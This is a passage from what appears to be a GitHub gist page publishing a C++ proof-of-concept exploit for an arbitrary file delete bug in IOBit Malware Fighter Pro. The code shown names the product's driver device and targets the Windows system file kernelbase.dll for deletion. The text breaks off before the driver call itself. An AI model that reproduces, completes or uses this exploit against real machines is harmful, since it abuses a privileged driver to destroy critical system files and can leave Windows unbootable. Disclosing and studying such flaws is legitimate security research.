Skip to content

Instantly share code, notes, and snippets.

View realzvqle's full-sized avatar
🧭
rundll32 user32.dll,LockWorkstation

zvqle realzvqle

🧭
rundll32 user32.dll,LockWorkstation
View GitHub Profile
@alfarom256
alfarom256 / IOBitStillSucks.cpp
Created January 6, 2025 22:54
Arbitrary File Delete in IOBit Malware Fighter "Pro"
#include <Windows.h>
#include <stdio.h>
const wchar_t* wstrDummyFile = LR"(\??\C:\Windows\System32\kernelbase.dll)";
const char* strDeviceName = R"(\\.\IMFForceDelete123)";
int main() {
DWORD dwReturnVal = 0;
DWORD dwBytesReturned = 0;
BOOL bRes = FALSE;